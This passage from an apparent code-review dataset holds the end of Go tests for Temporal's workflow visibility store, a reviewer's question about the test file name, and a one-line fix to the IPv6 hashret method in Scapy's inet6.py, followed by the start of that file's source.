commonpb.WorkflowExecution{ WorkflowId: "visibility-pagination-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } startReq2 := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime2, }, } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq2) s.Nil(err1) // Get the first one resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, }) s.Nil(err2) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq2, resp.Executions[0]) // Use token to get the second one resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, NextPageToken: resp.NextPageToken, }) s.Nil(err3) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq1, resp.Executions[0]) // It is possible to not return non empty token which is going to return empty result if len(resp.NextPageToken) != 0 { // Now should get empty result by using token resp, err4 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, NextPageToken: resp.NextPageToken, }) s.Nil(err4) s.Equal(0, len(resp.Executions)) } } // TestFilteringByType test func (s *VisibilityPersistenceSuite) TestFilteringByType() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow-1", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow-2", StartTime: startTime, }, }) s.Nil(err1) // List open with filtering resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutionsByType(&manager.ListWorkflowExecutionsByTypeRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: startTime, }, WorkflowTypeName: "visibility-workflow-1", }) s.Nil(err2) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution1.WorkflowId, resp.Executions[0].Execution.WorkflowId) // Close both executions err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow-1", StartTime: startTime, }, CloseTime: time.Now(), }) s.Nil(err3) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow-2", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 3, } err4 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err4) // List closed with filtering resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutionsByType(&manager.ListWorkflowExecutionsByTypeRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, WorkflowTypeName: "visibility-workflow-2", }) s.Nil(err5) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestFilteringByWorkflowID test func (s *VisibilityPersistenceSuite) TestFilteringByWorkflowID() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err1) // List open with filtering resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutionsByWorkflowID(&manager.ListWorkflowExecutionsByWorkflowIDRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: startTime, }, WorkflowID: "visibility-filtering-test1", }) s.Nil(err2) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution1.WorkflowId, resp.Executions[0].Execution.WorkflowId) // Close both executions err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), }) s.Nil(err3) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 3, } err4 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err4) // List closed with filtering resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutionsByWorkflowID(&manager.ListWorkflowExecutionsByWorkflowIDRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, WorkflowID: "visibility-filtering-test2", }) s.Nil(err5) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestFilteringByStatus test func (s *VisibilityPersistenceSuite) TestFilteringByStatus() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err1) // Close both executions with different status err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_COMPLETED, }, CloseTime: time.Now(), }) s.Nil(err2) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }, CloseTime: time.Now(), HistoryLength: 3, } err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err3) // List closed with filtering resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutionsByStatus(&manager.ListClosedWorkflowExecutionsByStatusRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }) s.Nil(err4) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestDelete test func (s *VisibilityPersistenceSuite) TestDelete() { if s.VisibilityMgr.GetName() == "cassandra" { // This test is not applicable for cassandra. return } nRows := 5 testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now().UTC().Add(time.Second * -5) for i := 0; i < nRows; i++ { workflowExecution := commonpb.WorkflowExecution{ WorkflowId: uuid.New(), RunId: uuid.New(), } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }, CloseTime: time.Now(), HistoryLength: 3, } err1 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err1) } resp, err3 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, EarliestStartTime: startTime, LatestStartTime: time.Now(), PageSize: 10, }) s.Nil(err3) s.Equal(nRows, len(resp.Executions)) remaining := nRows for _, row := range resp.Executions { err4 := s.VisibilityMgr.DeleteWorkflowExecution(&manager.VisibilityDeleteWorkflowExecutionRequest{ NamespaceID: testNamespaceUUID, RunID: row.GetExecution().GetRunId(), }) s.Nil(err4) remaining-- resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, EarliestStartTime: startTime, LatestStartTime: time.Now(), PageSize: 10, }) s.Nil(err5) s.Equal(remaining, len(resp.Executions)) } } // TestUpsertWorkflowExecution test func (s *VisibilityPersistenceSuite) TestUpsertWorkflowExecution() { tests := []struct { request *manager.UpsertWorkflowExecutionRequest expected error }{ { request: &manager.UpsertWorkflowExecutionRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: "", Namespace: "", Execution: commonpb.WorkflowExecution{}, WorkflowTypeName: "", StartTime: time.Time{}, ExecutionTime: time.Time{}, TaskID: 0, Memo: nil, SearchAttributes: &commonpb.SearchAttributes{ IndexedFields: map[string]*commonpb.Payload{ searchattribute.TemporalChangeVersion: payload.EncodeBytes([]byte("dummy")), }, }, Status: enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING, }, }, expected: nil, }, { request: &manager.UpsertWorkflowExecutionRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: "", Namespace: "", Execution: commonpb.WorkflowExecution{}, WorkflowTypeName: "", StartTime: time.Time{}, ExecutionTime: time.Time{}, TaskID: 0, Memo: nil, SearchAttributes: nil, Status: enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING, }, }, // To avoid blocking the task queue processors on non-ElasticSearch visibility stores // we simply treat any attempts to perform Upserts as "no-ops" // Attempts to Scan, Count or List will still fail for non-ES stores. expected: nil, }, } for _, test := range tests { s.Equal(test.expected, s.VisibilityMgr.UpsertWorkflowExecution(test.request)) } } func (s *VisibilityPersistenceSuite) assertClosedExecutionEquals( req *manager.RecordWorkflowExecutionClosedRequest, resp *workflowpb.WorkflowExecutionInfo) { s.Equal(req.Execution.RunId, resp.Execution.RunId) s.Equal(req.Execution.WorkflowId, resp.Execution.WorkflowId) s.Equal(req.WorkflowTypeName, resp.GetType().GetName()) s.Equal(persistence.UnixMilliseconds(req.StartTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetStartTime()))) s.Equal(persistence.UnixMilliseconds(req.CloseTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetCloseTime()))) s.Equal(req.Status, resp.GetStatus()) s.Equal(req.HistoryLength, resp.HistoryLength) } func (s *VisibilityPersistenceSuite) assertOpenExecutionEquals( req *manager.RecordWorkflowExecutionStartedRequest, resp *workflowpb.WorkflowExecutionInfo) { s.Equal(req.Execution.GetRunId(), resp.Execution.GetRunId()) s.Equal(req.Execution.WorkflowId, resp.Execution.WorkflowId) s.Equal(req.WorkflowTypeName, resp.GetType().GetName()) s.Equal(persistence.UnixMilliseconds(req.StartTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetStartTime()))) s.Nil(resp.CloseTime) s.Equal(resp.Status, enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING) s.Zero(resp.HistoryLength) }
1
13,365
should this file ends with _test.go?
temporalio-temporal
go
@@ -382,7 +382,7 @@ class IPv6(_IPv6GuessPayload, Packet, IPTools): if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) - ss = inet_pton(socket.AF_INET6, self.src) + ss = inet_pton(socket.AF_INET6, ss) return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 else: return struct.pack("B", nh) + self.payload.hashret()
1
############################################################################# # # # inet6.py --- IPv6 support for Scapy # # see http://natisbad.org/IPv6/ # # for more information # # # # Copyright (C) 2005 Guillaume Valadon <[email protected]> # # Arnaud Ebalard <[email protected]> # # # # This program is free software; you can redistribute it and/or modify it # # under the terms of the GNU General Public License version 2 as # # published by the Free Software Foundation. # # # # This program is distributed in the hope that it will be useful, but # # WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # ############################################################################# """ IPv6 (Internet Protocol v6). """ from __future__ import absolute_import from __future__ import print_function from hashlib import md5 import random import socket import struct from time import gmtime, strftime from scapy.arch import get_if_hwaddr from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.config import conf import scapy.consts from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ X3BytesField, XBitField, XIntField, XShortField from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP import scapy.modules.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket, L3RawSocket from scapy.utils import checksum, strxor from scapy.pton_ntop import inet_pton, inet_ntop from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo from scapy.volatile import RandInt, RandShort if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 if conf.route6 is None: # unused import, only to initialize conf.route6 import scapy.route6 ########################## # Neighbor cache stuff # ########################## conf.netcache.new_cache("in6_neighbor", 120) @conf.commands.register def neighsol(addr, src, iface, timeout=1, chainCC=0): """Sends and receive an ICMPv6 Neighbor Solicitation message This function sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address address. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). """ nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res @conf.commands.register def getmacbyip6(ip6, chainCC=0): """Returns the MAC address corresponding to an IPv6 address neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if isinstance(ip6, Net6): ip6 = str(ip6) if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff, a, nh = conf.route6.route(ip6) if iff == scapy.consts.LOOPBACK_INTERFACE: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# # IPv6 Class # ############################################################################# ############################################################################# ipv6nh = {0: "Hop-by-Hop Option Header", 4: "IP", 6: "TCP", 17: "UDP", 41: "IPv6", 43: "Routing Header", 44: "Fragment Header", 47: "GRE", 50: "ESP Header", 51: "AH Header", 58: "ICMPv6", 59: "No Next Header", 60: "Destination Option Header", 112: "VRRP", 132: "SCTP", 135: "Mobility Header"} ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", # 50: "IPv6ExtHrESP", # 51: "IPv6ExtHdrAH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt"} class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16 * len(i) def i2count(self, pkt, i): if isinstance(i, list): return len(i) return 0 def getfield(self, pkt, s): c = tmp_len = None if self.length_from is not None: tmp_len = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = b"" remain = s if tmp_len is not None: remain, ret = s[:tmp_len], s[tmp_len:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain + ret, lst def i2m(self, pkt, x): s = b"" for y in x: try: y = inet_pton(socket.AF_INET6, y) except Exception: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self, pkt, x): s = [] if x is None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" % (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self, p): if self.nh == 58: # ICMPv6 t = orb(p[0]) if len(p) > 2 and (t == 139 or t == 140): # Node Info Query return _niquery_guesser(p) if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 if t == 130 and len(p) >= 28: # RFC 3810 - 8.1. Query Version Distinctions return ICMPv6MLQuery2 return icmp6typescls.get(t, Raw) return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header return IPv6ExtHdrSegmentRouting return ipv6nhcls.get(self.nh, Raw) class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [BitField("version", 6, 4), BitField("tc", 0, 8), # TODO: IPv6, ByteField ? BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1")] def route(self): """Used to select the L2 address""" dst = self.dst if isinstance(dst, Gen): dst = next(iter(dst)) return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src, self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: tmp_len = len(p) - 40 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] return p def extract_padding(self, data): """Extract the IPv6 payload""" if self.plen == 0 and self.nh == 0 and len(data) >= 8: # Extract Hop-by-Hop extension length hbh_len = orb(data[1]) hbh_len = 8 + hbh_len * 8 # Extract length from the Jumbogram option # Note: the following algorithm take advantage of the Jumbo option # mandatory alignment (4n + 2, RFC2675 Section 2) jumbo_len = None idx = 0 offset = 4 * idx + 2 while offset <= len(data): opt_type = orb(data[offset]) if opt_type == 0xc2: # Jumbo option jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 break offset = 4 * idx + 2 idx += 1 if jumbo_len is None: warning("Scapy did not find a Jumbo option") jumbo_len = 0 tmp_len = hbh_len + jumbo_len else: tmp_len = self.plen return data[:tmp_len], data[tmp_len:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133, 134, 135, 136, 144, 145]): return struct.pack("B", self.nh) + self.payload.hashret() if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 return self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 # With segment routing header (rh == 4), the destination is # the first address of the IPv6 addresses list try: sd = self.addresses[0] except IndexError: sd = self.dst if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, self.src) return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 else: return struct.pack("B", nh) + self.payload.hashret() def answers(self, other): if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP if self.nh in [4, 41]: return self.payload.answers(other) if isinstance(other, IPv6) and other.nh in [4, 41]: return self.answers(other.payload) if isinstance(other, IP) and other.proto in [4, 41]: return self.answers(other.payload) if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: # ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) class _IPv46(IP): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. """ @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: if orb(_pkt[0]) >> 4 == 6: return IPv6 elif kargs.get("version") == 6: return IPv6 return IP def inet6_register_l3(l2, l3): return getmacbyip6(l3.dst) conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # < Basic case (ss == os and request_has_rh)): # ^ Request has a RH : don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) res = s1[:tmp_len] == s2[:tmp_len] # recall saved values otherup.options = old_otherup_opts otherup.chksum = old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) return s1[:tmp_len] == s2[:tmp_len] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# # Upper Layer Checksum computation # ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0)] def in6_chksum(nh, u, p): """ As Specified in RFC 2460 - 8.1 Upper-Layer Checksums Performs IPv6 Upper Layer checksum computation. This function operates by filling a pseudo header class instance (PseudoIPv6) with: - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). - the length is the length of provided payload string ('p') :param nh: value of upper layer protocol :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) :param p: the 